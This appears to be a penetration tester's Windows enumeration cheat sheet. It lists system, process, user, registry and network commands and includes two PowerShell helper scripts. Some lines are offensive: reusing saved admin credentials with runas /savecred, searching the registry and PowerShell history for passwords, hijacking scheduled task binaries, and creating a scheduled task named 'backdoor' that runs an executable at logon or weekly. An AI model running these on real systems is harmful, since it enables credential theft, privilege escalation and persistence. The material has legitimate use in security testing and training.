General system enumeration
Get general information about the OS:
systeminfo
Get the environment variables:
set
Enumerate cached credentials:
cmdkey /list
- If an application is listed, try to use runas to run a command with the stored credentials:
runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\share"
If the OS version is not yet known, try to determine it from one of the following files:
- C:\windows\system32\eula.txt (XP)
- C:\boot.ini
- C:\Windows\System32\License.rtf
- C:\ProgramData\Microsoft\Diagnosis\osver.txt (Win10)
Processes enumeration
tasklist /V
tasklist /V | find "cmd.exe" // Search for a command
tasklist /V /fi "USERNAME eq NT AUTHORITY\SYSTEM" /fi "STATUS eq running" // List all SYSTEM processes
taskkill /PID $pid // Kill a process
PS> Get-Process
PS> Get-CimInstance Win32_Process | Select-Object ProcessId, Name, CommandLine // Also returns the full command line, including the executable path
PS> Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match "VeryInterestingProcess" } | Select-Object ProcessId, Name, CommandLine // Filter by a string in the command line
Determine the parent process in two steps (the second command takes the ParentProcessId returned by the first):
wmic process where (ProcessId=7668) get parentprocessid // Get the parent process id
wmic process where (ProcessId=7148) get executablepath // Get the executable path of the parent process
Alternative with the Sysinternals tools (-t prints the process tree):
pslist /accepteula -t
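The two wmic steps above can be collapsed into one loop. The following is an added example, not part of the original notes: it walks from a given process id up through its ancestors with Get-CimInstance and stops when it reaches a parent id that has since been reused by a newer process (ParentProcessId is recorded at creation time and never validated afterwards, so a naive walk can report a false parent). The starting id 7668 is the value from the wmic example above; the function name is this example's own.

```powershell
# Added example (not from the original notes): resolve the parent chain of a process.
# Uses Get-CimInstance Win32_Process, so it works on builds where wmic is no longer present.
function Get-ProcessAncestry {
    param([Parameter(Mandatory)][int]$StartProcessId)

    $chain   = @()
    $visited = @{}
    $current = Get-CimInstance Win32_Process -Filter "ProcessId = $StartProcessId"

    while ($current -and -not $visited.ContainsKey([int]$current.ProcessId)) {
        $visited[[int]$current.ProcessId] = $true
        $chain += [pscustomobject]@{
            ProcessId       = $current.ProcessId
            ParentProcessId = $current.ParentProcessId
            Name            = $current.Name
            ExecutablePath  = $current.ExecutablePath
            Started         = $current.CreationDate
            Note            = ''
        }

        $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($current.ParentProcessId)"

        # If the real parent exited and its id was handed to a newer process, that process
        # started *after* the child. Report that instead of a false parent and stop walking.
        if ($parent -and $parent.CreationDate -gt $current.CreationDate) {
            $chain[-1].Note = 'parent exited; PID reused'
            break
        }
        $current = $parent
    }
    $chain
}

# Usage: the id comes from tasklist / Get-Process; 7668 is the value used in the wmic example.
Get-ProcessAncestry -StartProcessId 7668 | Format-Table -AutoSize
```

The loop also terminates at PID 0 (System Idle Process, which lists itself as its own parent) through the visited table, so it cannot spin forever.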
User and group enumeration
Check the current user's privileges and groups:
whoami /all
Enumerate all users:
net users
net user $username // get details for each user
PS> Get-LocalUser
Enumerate all groups:
net localgroup
PS> Get-LocalGroup
Get all members of a group:
net localgroup $group
PS> Get-LocalGroupMember $group
File system enumeration
Determine all drives:
fsutil fsinfo drives
Determine the type of a drive:
fsutil fsinfo drivetype Z:
Get general information about a drive:
fsutil fsinfo volumeinfo C:
Scheduled tasks enumeration
Show all scheduled tasks. NOTE: if a task is not in the root folder, include its folder path in the /TN value of the subsequent commands!
schtasks /Query
schtasks /query /fo LIST /v
schtasks /query /fo CSV /v | findstr /I "admin" // Use this to filter the output for an interesting user, path, etc.
If there is a task you can execute and you can change its binary (check with icacls), binary hijacking may be possible.
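The icacls check above is done one task at a time. As an added example (not part of the original notes), the following PowerShell function applies it to every registered task: it resolves each task's action binary and reports those that Everyone, Users, Authenticated Users or INTERACTIVE are allowed to modify, together with the account the task runs as. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later); the function name and the group list are this example's own choices.

```powershell
# Added example (not from the original notes): find scheduled tasks whose action binary
# can be modified by broad groups, i.e. the precondition for task binary hijacking.
function Get-WeakTaskBinaries {
    $broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

    # Rights that let a principal replace or alter the file. Generic bits are included
    # because some ACEs are stored as GENERIC_WRITE (0x40000000) / GENERIC_ALL (0x10000000).
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $writeMask = [int]($fsr::Write -bor $fsr::Modify -bor $fsr::FullControl -bor
                       $fsr::Delete -bor $fsr::TakeOwnership -bor $fsr::ChangePermissions) -bor 0x40000000 -bor 0x10000000

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only Exec actions carry a program path; COM-handler actions are skipped.
            if (-not $action.Execute) { continue }

            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not [System.IO.Path]::IsPathRooted($exe)) {
                # Bare names such as "cmd.exe" are resolved through PATH at run time.
                $cmd = Get-Command $exe -CommandType Application -ErrorAction SilentlyContinue
                if (-not $cmd) { continue }
                $exe = $cmd.Source
            }
            if (-not (Test-Path -LiteralPath $exe)) { continue }

            $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
            if (-not $acl) { continue }

            foreach ($ace in $acl.Access) {
                $rights = [int]$ace.FileSystemRights
                if ($ace.AccessControlType -eq 'Allow' -and
                    $broadGroups -contains $ace.IdentityReference.Value -and
                    ($rights -band $writeMask) -ne 0) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunAs     = $task.Principal.UserId
                        RunLevel  = $task.Principal.RunLevel
                        Binary    = $exe
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

# Tasks running as SYSTEM or with RunLevel Highest and a writable binary are the ones to fix first.
Get-WeakTaskBinaries | Sort-Object RunAs | Format-Table -AutoSize
```

Run it from an elevated prompt so that Get-ScheduledTask returns every task, not only those visible to the current user. The check covers the file itself; a writable containing directory is a separate condition (rename and replace) that the same loop can test by calling Get-Acl on Split-Path $exe.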
Create a new task named backdoor which runs at a fixed time:
schtasks /create /sc weekly /d mon /tn backdoor /tr C:\s32.exe /st 23:00
Create a new task named backdoor which runs when a user logs in:
schtasks /Create /TR s32.exe /RU $username /TN backdoor /SC ONLOGON /IT
Confirm that the task was created correctly:
schtasks /query /TN backdoor /fo LIST /V
Delete the task backdoor:
schtasks /delete /tn backdoor
Execute the task backdoor now:
schtasks /Run /TN backdoor
Registry enumeration
Get installed software (32-bit and 64-bit uninstall keys):
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
PS> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
PS> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
See the Registry post for more.
Search for passwords:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Search for usernames as well, e.g. check whether the registry contains anything about an interesting user.
Network enumeration
IP configuration:
ipconfig
List all network shares:
net share
List the routing table:
route print
List connections and listening ports with their owning PIDs:
netstat -ano
Extended enumeration
- Check the PowerShell history file:
  %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
- Upload the Sysinternals Suite. Then enumerate installed software:
PsInfo64.exe /accepteula -s